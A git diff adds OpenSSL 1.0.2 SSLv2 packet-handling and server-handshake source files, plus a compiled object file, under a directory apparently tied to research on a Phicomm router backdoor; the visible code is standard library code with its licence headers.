+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "ssl_locl.h"
+#ifndef OPENSSL_NO_SSL2
+# include <stdio.h>
+# include <errno.h>
+# define USE_SOCKETS
+
+static int read_n(SSL *s, unsigned int n, unsigned int max,
+                  unsigned int extend);
+static int n_do_ssl_write(SSL *s, const unsigned char *buf, unsigned int len);
+static int write_pending(SSL *s, const unsigned char *buf, unsigned int len);
+static int ssl_mt_error(int n);
+
+/*
+ * SSL 2.0 imlementation for SSL_read/SSL_peek - This routine will return 0
+ * to len bytes, decrypted etc if required.
+ */
+static int ssl2_read_internal(SSL *s, void *buf, int len, int peek)
+{
+    int n;
+    unsigned char mac[MAX_MAC_SIZE];
+    unsigned char *p;
+    int i;
+    int mac_size;
+
+ ssl2_read_again:
+    if (SSL_in_init(s) && !s->in_handshake) {
+        n = s->handshake_func(s);
+        if (n < 0)
+            return (n);
+        if (n == 0) {
+            SSLerr(SSL_F_SSL2_READ_INTERNAL, SSL_R_SSL_HANDSHAKE_FAILURE);
+            return (-1);
+        }
+    }
+
+    clear_sys_error();
+    s->rwstate = SSL_NOTHING;
+    if (len <= 0)
+        return (len);
+
+    if (s->s2->ract_data_length != 0) { /* read from buffer */
+        if (len > s->s2->ract_data_length)
+            n = s->s2->ract_data_length;
+        else
+            n = len;
+
+        memcpy(buf, s->s2->ract_data, (unsigned int)n);
+        if (!peek) {
+            s->s2->ract_data_length -= n;
+            s->s2->ract_data += n;
+            if (s->s2->ract_data_length == 0)
+                s->rstate = SSL_ST_READ_HEADER;
+        }
+
+        return (n);
+    }
+
+    /*
+     * s->s2->ract_data_length == 0 Fill the buffer, then goto
+     * ssl2_read_again.
+     */
+
+    if (s->rstate == SSL_ST_READ_HEADER) {
+        if (s->first_packet) {
+            n = read_n(s, 5, SSL2_MAX_RECORD_LENGTH_2_BYTE_HEADER + 2, 0);
+            if (n <= 0)
+                return (n);     /* error or non-blocking */
+            s->first_packet = 0;
+            p = s->packet;
+            if (!((p[0] & 0x80) && ((p[2] == SSL2_MT_CLIENT_HELLO) ||
+                                    (p[2] == SSL2_MT_SERVER_HELLO)))) {
+                SSLerr(SSL_F_SSL2_READ_INTERNAL,
+                       SSL_R_NON_SSLV2_INITIAL_PACKET);
+                return (-1);
+            }
+        } else {
+            n = read_n(s, 2, SSL2_MAX_RECORD_LENGTH_2_BYTE_HEADER + 2, 0);
+            if (n <= 0)
+                return (n);     /* error or non-blocking */
+        }
+        /* part read stuff */
+
+        s->rstate = SSL_ST_READ_BODY;
+        p = s->packet;
+        /* Do header */
+        /*
+         * s->s2->padding=0;
+         */
+        s->s2->escape = 0;
+        s->s2->rlength = (((unsigned int)p[0]) << 8) | ((unsigned int)p[1]);
+        if ((p[0] & TWO_BYTE_BIT)) { /* Two byte header? */
+            s->s2->three_byte_header = 0;
+            s->s2->rlength &= TWO_BYTE_MASK;
+        } else {
+            s->s2->three_byte_header = 1;
+            s->s2->rlength &= THREE_BYTE_MASK;
+
+            /* security >s2->escape */
+            s->s2->escape = ((p[0] & SEC_ESC_BIT)) ? 1 : 0;
+        }
+    }
+
+    if (s->rstate == SSL_ST_READ_BODY) {
+        n = s->s2->rlength + 2 + s->s2->three_byte_header;
+        if (n > (int)s->packet_length) {
+            n -= s->packet_length;
+            i = read_n(s, (unsigned int)n, (unsigned int)n, 1);
+            if (i <= 0)
+                return (i);     /* ERROR */
+        }
+
+        p = &(s->packet[2]);
+        s->rstate = SSL_ST_READ_HEADER;
+        if (s->s2->three_byte_header)
+            s->s2->padding = *(p++);
+        else
+            s->s2->padding = 0;
+
+        /* Data portion */
+        if (s->s2->clear_text) {
+            mac_size = 0;
+            s->s2->mac_data = p;
+            s->s2->ract_data = p;
+            if (s->s2->padding) {
+                SSLerr(SSL_F_SSL2_READ_INTERNAL, SSL_R_ILLEGAL_PADDING);
+                return (-1);
+            }
+        } else {
+            mac_size = EVP_MD_CTX_size(s->read_hash);
+            if (mac_size < 0)
+                return -1;
+            OPENSSL_assert(mac_size <= MAX_MAC_SIZE);
+            s->s2->mac_data = p;
+            s->s2->ract_data = &p[mac_size];
+            if (s->s2->padding + mac_size > s->s2->rlength) {
+                SSLerr(SSL_F_SSL2_READ_INTERNAL, SSL_R_ILLEGAL_PADDING);
+                return (-1);
+            }
+        }
+
+        s->s2->ract_data_length = s->s2->rlength;
+        /*
+         * added a check for length > max_size in case encryption was not
+         * turned on yet due to an error
+         */
+        if ((!s->s2->clear_text) &&
+            (s->s2->rlength >= (unsigned int)mac_size)) {
+            if (!ssl2_enc(s, 0)) {
+                SSLerr(SSL_F_SSL2_READ_INTERNAL, SSL_R_DECRYPTION_FAILED);
+                return (-1);
+            }
+            s->s2->ract_data_length -= mac_size;
+            ssl2_mac(s, mac, 0);
+            s->s2->ract_data_length -= s->s2->padding;
+            if ((CRYPTO_memcmp(mac, s->s2->mac_data, mac_size) != 0) ||
+                (s->s2->rlength %
+                 EVP_CIPHER_CTX_block_size(s->enc_read_ctx) != 0)) {
+                SSLerr(SSL_F_SSL2_READ_INTERNAL, SSL_R_BAD_MAC_DECODE);
+                return (-1);
+            }
+        }
+        INC32(s->s2->read_sequence); /* expect next number */
+        /* s->s2->ract_data is now available for processing */
+
+        /*
+         * Possibly the packet that we just read had 0 actual data bytes.
+         * (SSLeay/OpenSSL itself never sends such packets; see ssl2_write.)
+         * In this case, returning 0 would be interpreted by the caller as
+         * indicating EOF, so it's not a good idea.  Instead, we just
+         * continue reading; thus ssl2_read_internal may have to process
+         * multiple packets before it can return. [Note that using select()
+         * for blocking sockets *never* guarantees that the next SSL_read
+         * will not block -- the available data may contain incomplete
+         * packets, and except for SSL 2, renegotiation can confuse things
+         * even more.]
+         */
+
+        goto ssl2_read_again;   /* This should really be "return
+                                 * ssl2_read(s,buf,len)", but that would
+                                 * allow for denial-of-service attacks if a C
+                                 * compiler is used that does not recognize
+                                 * end-recursion. */
+    } else {
+        SSLerr(SSL_F_SSL2_READ_INTERNAL, SSL_R_BAD_STATE);
+        return (-1);
+    }
+}
+
+int ssl2_read(SSL *s, void *buf, int len)
+{
+    return ssl2_read_internal(s, buf, len, 0);
+}
+
+int ssl2_peek(SSL *s, void *buf, int len)
+{
+    return ssl2_read_internal(s, buf, len, 1);
+}
+
+static int read_n(SSL *s, unsigned int n, unsigned int max,
+                  unsigned int extend)
+{
+    int i, off, newb;
+
+    /*
+     * if there is stuff still in the buffer from a previous read, and there
+     * is more than we want, take some.
+     */
+    if (s->s2->rbuf_left >= (int)n) {
+        if (extend)
+            s->packet_length += n;
+        else {
+            s->packet = &(s->s2->rbuf[s->s2->rbuf_offs]);
+            s->packet_length = n;
+        }
+        s->s2->rbuf_left -= n;
+        s->s2->rbuf_offs += n;
+        return (n);
+    }
+
+    if (!s->read_ahead)
+        max = n;
+    if (max > (unsigned int)(SSL2_MAX_RECORD_LENGTH_2_BYTE_HEADER + 2))
+        max = SSL2_MAX_RECORD_LENGTH_2_BYTE_HEADER + 2;
+
+    /*
+     * Else we want more than we have. First, if there is some left or we
+     * want to extend
+     */
+    off = 0;
+    if ((s->s2->rbuf_left != 0) || ((s->packet_length != 0) && extend)) {
+        newb = s->s2->rbuf_left;
+        if (extend) {
+            off = s->packet_length;
+            if (s->packet != s->s2->rbuf)
+                memcpy(s->s2->rbuf, s->packet, (unsigned int)newb + off);
+        } else if (s->s2->rbuf_offs != 0) {
+            memcpy(s->s2->rbuf, &(s->s2->rbuf[s->s2->rbuf_offs]),
+                   (unsigned int)newb);
+            s->s2->rbuf_offs = 0;
+        }
+        s->s2->rbuf_left = 0;
+    } else
+        newb = 0;
+
+    /*
+     * off is the offset to start writing too. r->s2->rbuf_offs is the
+     * 'unread data', now 0. newb is the number of new bytes so far
+     */
+    s->packet = s->s2->rbuf;
+    while (newb < (int)n) {
+        clear_sys_error();
+        if (s->rbio != NULL) {
+            s->rwstate = SSL_READING;
+            i = BIO_read(s->rbio, (char *)&(s->s2->rbuf[off + newb]),
+                         max - newb);
+        } else {
+            SSLerr(SSL_F_READ_N, SSL_R_READ_BIO_NOT_SET);
+            i = -1;
+        }
+# ifdef PKT_DEBUG
+        if (s->debug & 0x01)
+            sleep(1);
+# endif
+        if (i <= 0) {
+            s->s2->rbuf_left += newb;
+            return (i);
+        }
+        newb += i;
+    }
+
+    /* record unread data */
+    if (newb > (int)n) {
+        s->s2->rbuf_offs = n + off;
+        s->s2->rbuf_left = newb - n;
+    } else {
+        s->s2->rbuf_offs = 0;
+        s->s2->rbuf_left = 0;
+    }
+    if (extend)
+        s->packet_length += n;
+    else
+        s->packet_length = n;
+    s->rwstate = SSL_NOTHING;
+    return (n);
+}
+
+int ssl2_write(SSL *s, const void *_buf, int len)
+{
+    const unsigned char *buf = _buf;
+    unsigned int n, tot;
+    int i;
+
+    if (SSL_in_init(s) && !s->in_handshake) {
+        i = s->handshake_func(s);
+        if (i < 0)
+            return (i);
+        if (i == 0) {
+            SSLerr(SSL_F_SSL2_WRITE, SSL_R_SSL_HANDSHAKE_FAILURE);
+            return (-1);
+        }
+    }
+
+    if (s->error) {
+        ssl2_write_error(s);
+        if (s->error)
+            return (-1);
+    }
+
+    clear_sys_error();
+    s->rwstate = SSL_NOTHING;
+    if (len <= 0)
+        return (len);
+
+    tot = s->s2->wnum;
+    s->s2->wnum = 0;
+
+    n = (len - tot);
+    for (;;) {
+        i = n_do_ssl_write(s, &(buf[tot]), n);
+        if (i <= 0) {
+            s->s2->wnum = tot;
+            return (i);
+        }
+        if ((i == (int)n) || (s->mode & SSL_MODE_ENABLE_PARTIAL_WRITE)) {
+            return (tot + i);
+        }
+
+        n -= i;
+        tot += i;
+    }
+}
+
+static int write_pending(SSL *s, const unsigned char *buf, unsigned int len)
+{
+    int i;
+
+    /* s->s2->wpend_len != 0 MUST be true. */
+
+    /*
+     * check that they have given us the same buffer to write
+     */
+    if ((s->s2->wpend_tot > (int)len) ||
+        ((s->s2->wpend_buf != buf) &&
+         !(s->mode & SSL_MODE_ACCEPT_MOVING_WRITE_BUFFER))) {
+        SSLerr(SSL_F_WRITE_PENDING, SSL_R_BAD_WRITE_RETRY);
+        return (-1);
+    }
+
+    for (;;) {
+        clear_sys_error();
+        if (s->wbio != NULL) {
+            s->rwstate = SSL_WRITING;
+            i = BIO_write(s->wbio,
+                          (char *)&(s->s2->write_ptr[s->s2->wpend_off]),
+                          (unsigned int)s->s2->wpend_len);
+        } else {
+            SSLerr(SSL_F_WRITE_PENDING, SSL_R_WRITE_BIO_NOT_SET);
+            i = -1;
+        }
+# ifdef PKT_DEBUG
+        if (s->debug & 0x01)
+            sleep(1);
+# endif
+        if (i == s->s2->wpend_len) {
+            s->s2->wpend_len = 0;
+            s->rwstate = SSL_NOTHING;
+            return (s->s2->wpend_ret);
+        } else if (i <= 0)
+            return (i);
+        s->s2->wpend_off += i;
+        s->s2->wpend_len -= i;
+    }
+}
+
+static int n_do_ssl_write(SSL *s, const unsigned char *buf, unsigned int len)
+{
+    unsigned int j, k, olen, p, bs;
+    int mac_size;
+    register unsigned char *pp;
+
+    olen = len;
+
+    /*
+     * first check if there is data from an encryption waiting to be sent -
+     * it must be sent because the other end is waiting. This will happen
+     * with non-blocking IO.  We print it and then return.
+     */
+    if (s->s2->wpend_len != 0)
+        return (write_pending(s, buf, len));
+
+    /* set mac_size to mac size */
+    if (s->s2->clear_text)
+        mac_size = 0;
+    else {
+        mac_size = EVP_MD_CTX_size(s->write_hash);
+        if (mac_size < 0)
+            return -1;
+    }
+
+    /* lets set the pad p */
+    if (s->s2->clear_text) {
+        if (len > SSL2_MAX_RECORD_LENGTH_2_BYTE_HEADER)
+            len = SSL2_MAX_RECORD_LENGTH_2_BYTE_HEADER;
+        p = 0;
+        s->s2->three_byte_header = 0;
+        /* len=len; */
+    } else {
+        bs = EVP_CIPHER_CTX_block_size(s->enc_read_ctx);
+        j = len + mac_size;
+        /*
+         * Two-byte headers allow for a larger record length than three-byte
+         * headers, but we can't use them if we need padding or if we have to
+         * set the escape bit.
+         */
+        if ((j > SSL2_MAX_RECORD_LENGTH_3_BYTE_HEADER) && (!s->s2->escape)) {
+            if (j > SSL2_MAX_RECORD_LENGTH_2_BYTE_HEADER)
+                j = SSL2_MAX_RECORD_LENGTH_2_BYTE_HEADER;
+            /*
+             * set k to the max number of bytes with 2 byte header
+             */
+            k = j - (j % bs);
+            /* how many data bytes? */
+            len = k - mac_size;
+            s->s2->three_byte_header = 0;
+            p = 0;
+        } else if ((bs <= 1) && (!s->s2->escape)) {
+            /*-
+             * j <= SSL2_MAX_RECORD_LENGTH_3_BYTE_HEADER, thus
+             * j < SSL2_MAX_RECORD_LENGTH_2_BYTE_HEADER
+             */
+            s->s2->three_byte_header = 0;
+            p = 0;
+        } else {                /* we may have to use a 3 byte header */
+
+            /*-
+             * If s->s2->escape is not set, then
+             * j <= SSL2_MAX_RECORD_LENGTH_3_BYTE_HEADER, and thus
+             * j < SSL2_MAX_RECORD_LENGTH_2_BYTE_HEADER.
+             */
+            p = (j % bs);
+            p = (p == 0) ? 0 : (bs - p);
+            if (s->s2->escape) {
+                s->s2->three_byte_header = 1;
+                if (j > SSL2_MAX_RECORD_LENGTH_3_BYTE_HEADER)
+                    j = SSL2_MAX_RECORD_LENGTH_3_BYTE_HEADER;
+            } else
+                s->s2->three_byte_header = (p == 0) ? 0 : 1;
+        }
+    }
+
+    /*-
+     * Now
+     *      j <= SSL2_MAX_RECORD_LENGTH_2_BYTE_HEADER
+     * holds, and if s->s2->three_byte_header is set, then even
+     *      j <= SSL2_MAX_RECORD_LENGTH_3_BYTE_HEADER.
+     */
+
+    /*
+     * mac_size is the number of MAC bytes len is the number of data bytes we
+     * are going to send p is the number of padding bytes (if it is a
+     * two-byte header, then p == 0)
+     */
+
+    s->s2->wlength = len;
+    s->s2->padding = p;
+    s->s2->mac_data = &(s->s2->wbuf[3]);
+    s->s2->wact_data = &(s->s2->wbuf[3 + mac_size]);
+    /* we copy the data into s->s2->wbuf */
+    memcpy(s->s2->wact_data, buf, len);
+    if (p)
+        memset(&(s->s2->wact_data[len]), 0, p); /* arbitrary padding */
+
+    if (!s->s2->clear_text) {
+        s->s2->wact_data_length = len + p;
+        ssl2_mac(s, s->s2->mac_data, 1);
+        s->s2->wlength += p + mac_size;
+        if (ssl2_enc(s, 1) < 1)
+            return -1;
+    }
+
+    /* package up the header */
+    s->s2->wpend_len = s->s2->wlength;
+    if (s->s2->three_byte_header) { /* 3 byte header */
+        pp = s->s2->mac_data;
+        pp -= 3;
+        pp[0] = (s->s2->wlength >> 8) & (THREE_BYTE_MASK >> 8);
+        if (s->s2->escape)
+            pp[0] |= SEC_ESC_BIT;
+        pp[1] = s->s2->wlength & 0xff;
+        pp[2] = s->s2->padding;
+        s->s2->wpend_len += 3;
+    } else {
+        pp = s->s2->mac_data;
+        pp -= 2;
+        pp[0] = ((s->s2->wlength >> 8) & (TWO_BYTE_MASK >> 8)) | TWO_BYTE_BIT;
+        pp[1] = s->s2->wlength & 0xff;
+        s->s2->wpend_len += 2;
+    }
+    s->s2->write_ptr = pp;
+
+    INC32(s->s2->write_sequence); /* expect next number */
+
+    /* lets try to actually write the data */
+    s->s2->wpend_tot = olen;
+    s->s2->wpend_buf = buf;
+
+    s->s2->wpend_ret = len;
+
+    s->s2->wpend_off = 0;
+    return (write_pending(s, buf, olen));
+}
+
+int ssl2_part_read(SSL *s, unsigned long f, int i)
+{
+    unsigned char *p;
+    int j;
+
+    if (i < 0) {
+        /* ssl2_return_error(s); */
+        /*
+         * for non-blocking io, this is not necessarily fatal
+         */
+        return (i);
+    } else {
+        s->init_num += i;
+
+        /*
+         * Check for error.  While there are recoverable errors, this
+         * function is not called when those must be expected; any error
+         * detected here is fatal.
+         */
+        if (s->init_num >= 3) {
+            p = (unsigned char *)s->init_buf->data;
+            if (p[0] == SSL2_MT_ERROR) {
+                j = (p[1] << 8) | p[2];
+                SSLerr((int)f, ssl_mt_error(j));
+                s->init_num -= 3;
+                if (s->init_num > 0)
+                    memmove(p, p + 3, s->init_num);
+            }
+        }
+
+        /*
+         * If it's not an error message, we have some error anyway -- the
+         * message was shorter than expected.  This too is treated as fatal
+         * (at least if SSL_get_error is asked for its opinion).
+         */
+        return (0);
+    }
+}
+
+int ssl2_do_write(SSL *s)
+{
+    int ret;
+
+    ret = ssl2_write(s, &s->init_buf->data[s->init_off], s->init_num);
+    if (ret == s->init_num) {
+        if (s->msg_callback)
+            s->msg_callback(1, s->version, 0, s->init_buf->data,
+                            (size_t)(s->init_off + s->init_num), s,
+                            s->msg_callback_arg);
+        return (1);
+    }
+    if (ret < 0)
+        return (-1);
+    s->init_off += ret;
+    s->init_num -= ret;
+    return (0);
+}
+
+static int ssl_mt_error(int n)
+{
+    int ret;
+
+    switch (n) {
+    case SSL2_PE_NO_CIPHER:
+        ret = SSL_R_PEER_ERROR_NO_CIPHER;
+        break;
+    case SSL2_PE_NO_CERTIFICATE:
+        ret = SSL_R_PEER_ERROR_NO_CERTIFICATE;
+        break;
+    case SSL2_PE_BAD_CERTIFICATE:
+        ret = SSL_R_PEER_ERROR_CERTIFICATE;
+        break;
+    case SSL2_PE_UNSUPPORTED_CERTIFICATE_TYPE:
+        ret = SSL_R_PEER_ERROR_UNSUPPORTED_CERTIFICATE_TYPE;
+        break;
+    default:
+        ret = SSL_R_UNKNOWN_REMOTE_ERROR_TYPE;
+        break;
+    }
+    return (ret);
+}
+#else                           /* !OPENSSL_NO_SSL2 */
+
+# if PEDANTIC
+static void *dummy = &dummy;
+# endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s2_pkt.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s2_pkt.o
new file mode 100644
index 0000000000000000000000000000000000000000..ae02dc9c1b590f75a06bc73dd6feb98ff6e79b83
GIT binary patch
literal 1080
zcmbVLO-sW-5S?`ES5JBqyu_1=c1f!udXPY=y@+@zh!;s>Pzd=T*?_(1U-0L6>|gR1
z=uEPU%WmtT1CzJ&_PyE3ru`V--gF!XR5)-Af0beZzBJNrXdim81uz+nuH3_ESZAVk
zFZn6=`h$zQDF^REk9%iFE#3C&B5Y%>VNUL*&;ghe$1wj3I=&0vKZ`VM;l$JvyDtc~
z<TTbyWg8f*+axj!C$gd%J{5`J5dg1dsR%+uQMUN1Rw8~Az@GyV01vAQc$BAUoFSLx
zBIbB8{YnH;BI}o|=0%woaVcijfvXXFXrntd-^^dqPW$|gVjrKxncvNCcI}7hKS0SQ
z=BoY^^iod`Qx9Jj$2y5?b-u!Ljnk!xUTACOQ`8t28<^%VtdIg%q5^tXJ*c1QrTtGS
pnoA^~N}_fpkN-UD?r7^?4%(AC1?K!axMAKsX&<HVK^Y~Q{$IFHIIjQz

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s2_srvr.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s2_srvr.c
new file mode 100644
index 0000000..daba6dd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s2_srvr.c
@@ -0,0 +1,1123 @@
+/* ssl/s2_srvr.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "ssl_locl.h"
+#ifndef OPENSSL_NO_SSL2
+# include <stdio.h>
+# include <openssl/bio.h>
+# include <openssl/rand.h>
+# include <openssl/objects.h>
+# include <openssl/evp.h>
+
+static const SSL_METHOD *ssl2_get_server_method(int ver);
+static int get_client_master_key(SSL *s);
+static int get_client_hello(SSL *s);
+static int server_hello(SSL *s);
+static int get_client_finished(SSL *s);
+static int server_verify(SSL *s);
+static int server_finish(SSL *s);
+static int request_certificate(SSL *s);
+static int ssl_rsa_private_decrypt(CERT *c, int len, unsigned char *from,
+                                   unsigned char *to, int padding);
+# define BREAK   break
+
+static const SSL_METHOD *ssl2_get_server_method(int ver)
+{
+    if (ver == SSL2_VERSION)
+        return (SSLv2_server_method());
+    else
+        return (NULL);
+}
+
+IMPLEMENT_ssl2_meth_func(SSLv2_server_method,
+                         ssl2_accept,
+                         ssl_undefined_function, ssl2_get_server_method)
+
+int ssl2_accept(SSL *s)
+{
+    unsigned long l = (unsigned long)time(NULL);
+    BUF_MEM *buf = NULL;
+    int ret = -1;
+    long num1;
+    void (*cb) (const SSL *ssl, int type, int val) = NULL;
+    int new_state, state;
+
+    RAND_add(&l, sizeof(l), 0);
+    ERR_clear_error();
+    clear_sys_error();
+
+    if (s->info_callback != NULL)
+        cb = s->info_callback;
+    else if (s->ctx->info_callback != NULL)
+        cb = s->ctx->info_callback;
+
+    /* init things to blank */
+    s->in_handshake++;
+    if (!SSL_in_init(s) || SSL_in_before(s))
+        SSL_clear(s);
+
+    if (s->cert == NULL) {
+        SSLerr(SSL_F_SSL2_ACCEPT, SSL_R_NO_CERTIFICATE_SET);
+        return (-1);
+    }
+
+    clear_sys_error();
+    for (;;) {
+        state = s->state;
+
+        switch (s->state) {
+        case SSL_ST_BEFORE:
+        case SSL_ST_ACCEPT:
+        case SSL_ST_BEFORE | SSL_ST_ACCEPT:
+        case SSL_ST_OK | SSL_ST_ACCEPT:
+
+            s->server = 1;
+            if (cb != NULL)
+                cb(s, SSL_CB_HANDSHAKE_START, 1);
+
+            s->version = SSL2_VERSION;
+            s->type = SSL_ST_ACCEPT;
+
+            if (s->init_buf == NULL) {
+                if ((buf = BUF_MEM_new()) == NULL) {
+                    ret = -1;
+                    goto end;
+                }
+                if (!BUF_MEM_grow
+                    (buf, (int)SSL2_MAX_RECORD_LENGTH_3_BYTE_HEADER)) {
+                    BUF_MEM_free(buf);
+                    ret = -1;
+                    goto end;
+                }
+                s->init_buf = buf;
+            }
+            s->init_num = 0;
+            s->ctx->stats.sess_accept++;
+            s->handshake_func = ssl2_accept;
+            s->state = SSL2_ST_GET_CLIENT_HELLO_A;
+            BREAK;
+
+        case SSL2_ST_GET_CLIENT_HELLO_A:
+        case SSL2_ST_GET_CLIENT_HELLO_B:
+        case SSL2_ST_GET_CLIENT_HELLO_C:
+            s->shutdown = 0;
+            ret = get_client_hello(s);
+            if (ret <= 0)
+                goto end;
+            s->init_num = 0;
+            s->state = SSL2_ST_SEND_SERVER_HELLO_A;
+            BREAK;
+
+        case SSL2_ST_SEND_SERVER_HELLO_A:
+        case SSL2_ST_SEND_SERVER_HELLO_B:
+            ret = server_hello(s);
+            if (ret <= 0)
+                goto end;
+            s->init_num = 0;
+            if (!s->hit) {
+                s->state = SSL2_ST_GET_CLIENT_MASTER_KEY_A;
+                BREAK;
+            } else {
+                s->state = SSL2_ST_SERVER_START_ENCRYPTION;
+                BREAK;
+            }
+        case SSL2_ST_GET_CLIENT_MASTER_KEY_A:
+        case SSL2_ST_GET_CLIENT_MASTER_KEY_B:
+            ret = get_client_master_key(s);
+            if (ret <= 0)
+                goto end;
